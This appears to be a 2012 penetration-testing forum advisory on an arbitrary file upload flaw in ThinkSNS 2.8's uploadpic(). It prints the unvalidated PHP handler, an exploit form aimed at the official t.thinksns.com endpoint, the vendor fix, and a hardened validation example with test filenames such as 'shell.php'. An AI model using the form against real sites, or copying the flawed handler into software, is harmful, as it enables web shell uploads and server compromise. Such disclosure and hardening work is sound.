中国网络渗透测试联盟 (China Network Penetration Testing Alliance)
Title: ThinkSNS 2.8 Arbitrary File Upload Vulnerability and Fix
Author: admin
Posted: 2012-12-4 11:12

When an image is attached to a microblog post, the file is validated only on the client side; the server performs no security filtering at all.

\api\StatusesApi.class.php

    function uploadpic(){
        if( $_FILES['pic'] ){
            // perform the upload
            $savePath = $this->_getSaveTempPath();
            // extension is copied verbatim from the client-supplied name: no whitelist
            $filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
            if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
            {
                $result['boolen'] = 1;
                $result['type_data'] = 'temp/'.$filename;
                $result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
            } else {
                $result['boolen'] = 0;
                $result['message'] = '上传失败'; // "upload failed"
            }
        }else{
            $result['boolen'] = 0;
            $result['message'] = '上传失败'; // "upload failed"
        }
        return $result;
    }

The uploadpic() method never checks the file type.

You can build a form, pick any file at all, and submit it to

/index.php?app=w3g&mod=Index&act=doPost

The address of the uploaded file then appears in the newly posted microblog entry (strip the small_ / middle_ prefix from the thumbnail name).

After logging in to the official ThinkSNS microblog, build the following form:

    <form action="http://t.thinksns.com/index.php?app=w3g&mod=Index&act=doPost" method="post" enctype="multipart/form-data">
        <textarea name="content">test</textarea>
        file: <input id="file" type="file" name="pic" />
        <input type="submit" value="Post" />
    </form>

Remove the thumbnail prefix (small_) to get the original file.

Fix:

\api\StatusesApi.class.php

    function uploadpic(){
        /**
         * 20121018 @yelo
         * Added upload type validation
         */
        $pathinfo = pathinfo($_FILES['pic']['name']);
        $ext = $pathinfo['extension'];
        $allowExts = array('jpg', 'png', 'gif', 'jpeg');

        // only proceed when a file was sent and its (last) extension is whitelisted
        $uploadCondition = $_FILES['pic'] && in_array(strtolower($ext),$allowExts,true);

        if( $uploadCondition ){
            // perform the upload
            $savePath = $this->_getSaveTempPath();
            $filename = md5( time().'teste' ).'.'.substr($_FILES['pic']['name'],strpos($_FILES['pic']['name'],'.')+1);
            if(@copy($_FILES['pic']['tmp_name'], $savePath.'/'.$filename) || @move_uploaded_file($_FILES['pic']['tmp_name'], $savePath.'/'.$filename))
            {
                $result['boolen'] = 1;
                $result['type_data'] = 'temp/'.$filename;
                $result['picurl'] = SITE_PATH.'/uploads/temp/'.$filename;
            } else {
                $result['boolen'] = 0;
                $result['message'] = '上传失败'; // "upload failed"
            }
        }else{
            $result['boolen'] = 0;
            $result['message'] = '上传失败'; // "upload failed"
        }
        return $result;
    }

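The fix above closes the hole the post describes (uploadpic() accepting any file type), but two details are worth noting for anyone hardening a similar handler. First, the whitelist test uses pathinfo(), which looks at the last extension, while the stored filename is still built with substr() from the first dot of the client-supplied name, so an upload named x.php.jpg passes the check and is stored as <md5>.php.jpg; whether a web server executes such a double-extension file depends on its handler configuration, so the stored name should come only from the validated extension. Second, an extension check alone says nothing about the file's content. The example below is added here and is not ThinkSNS code; the function names (checkUploadedImage, buildSafeFilename, saveUploadedImage) are this example's own. It keeps the original's return shape, checks the upload error code instead of the truthiness of $_FILES['pic'], requires the bytes to parse as the image type the extension claims, names the stored file from random bytes plus the validated extension, and uses move_uploaded_file() only (no copy() fallback). The demonstration at the bottom runs offline against a constructed 1x1 GIF.

```php
<?php
// Added example (not ThinkSNS code): hardened server-side validation for an
// image upload handler such as uploadpic(). Function names are this example's own.

// Map each accepted extension to the image type getimagesize() must report,
// so the file's content has to agree with the extension it claims.
const ALLOWED_IMAGE_TYPES = [
    'jpg'  => IMAGETYPE_JPEG,
    'jpeg' => IMAGETYPE_JPEG,
    'png'  => IMAGETYPE_PNG,
    'gif'  => IMAGETYPE_GIF,
];

/**
 * Validate one $_FILES entry without moving it.
 * Returns ['ok' => true, 'ext' => ...] or ['ok' => false, 'message' => ...].
 */
function checkUploadedImage(array $file): array
{
    // The unpatched code tested `if ($_FILES['pic'])`; check the error code instead.
    if (!isset($file['error'], $file['tmp_name'], $file['name'])
        || $file['error'] !== UPLOAD_ERR_OK) {
        return ['ok' => false, 'message' => 'upload failed or missing'];
    }
    // Only the LAST extension counts ("x.php.jpg" -> "jpg"); the client name is
    // never reused for the stored file, so no ".php" can survive into it.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!array_key_exists($ext, ALLOWED_IMAGE_TYPES)) {
        return ['ok' => false, 'message' => 'extension not allowed'];
    }
    // Content check: the bytes must parse as the image type the extension claims.
    $info = @getimagesize($file['tmp_name']);
    if ($info === false || $info[2] !== ALLOWED_IMAGE_TYPES[$ext]) {
        return ['ok' => false, 'message' => 'content is not a ' . $ext . ' image'];
    }
    return ['ok' => true, 'ext' => $ext];
}

/** Stored name = random bytes + the VALIDATED extension, never substr() of the client name. */
function buildSafeFilename(string $ext): string
{
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

/**
 * Move a validated upload into $savePath, keeping the original's result shape.
 * move_uploaded_file() refuses files that did not arrive via HTTP POST, and
 * there is deliberately no copy() fallback.
 */
function saveUploadedImage(array $file, string $savePath): array
{
    $check = checkUploadedImage($file);
    if (!$check['ok']) {
        return ['boolen' => 0, 'message' => $check['message']];
    }
    $filename = buildSafeFilename($check['ext']);
    if (!move_uploaded_file($file['tmp_name'], $savePath . '/' . $filename)) {
        return ['boolen' => 0, 'message' => 'upload failed'];
    }
    return ['boolen' => 1, 'type_data' => 'temp/' . $filename];
}

// --- Offline demonstration with constructed inputs (no real HTTP upload) ---
// A constructed 1x1 GIF so getimagesize() has genuine image bytes to inspect.
$gif = "GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
     . "\x21\xf9\x04\x01\x00\x00\x00\x00\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"
     . "\x02\x02\x44\x01\x00\x3b";
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, $gif);

$cases = [
    ['name' => 'a.gif',     'want' => true],   // valid extension, matching content
    ['name' => 'shell.php', 'want' => false],  // what the unpatched code accepted
    ['name' => 'x.php.jpg', 'want' => false],  // last ext is jpg, but bytes are GIF
    ['name' => 'x.php.gif', 'want' => true],   // accepted, but stored as <random>.gif
];
foreach ($cases as $c) {
    $r = checkUploadedImage(['name' => $c['name'], 'tmp_name' => $tmp,
                             'error' => UPLOAD_ERR_OK]);
    printf("%-10s ok=%d expected=%d %s\n", $c['name'], (int) $r['ok'],
           (int) $c['want'], $r['ok'] ? buildSafeFilename($r['ext']) : $r['message']);
}
unlink($tmp);
```

saveUploadedImage() is the piece that would replace the body of uploadpic(); it cannot be exercised from the command line because move_uploaded_file() only accepts files PHP itself received in a POST request, which is exactly the property the original's copy() fallback threw away.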
Source: 中国网络渗透测试联盟 (https://www.cobjon.com/)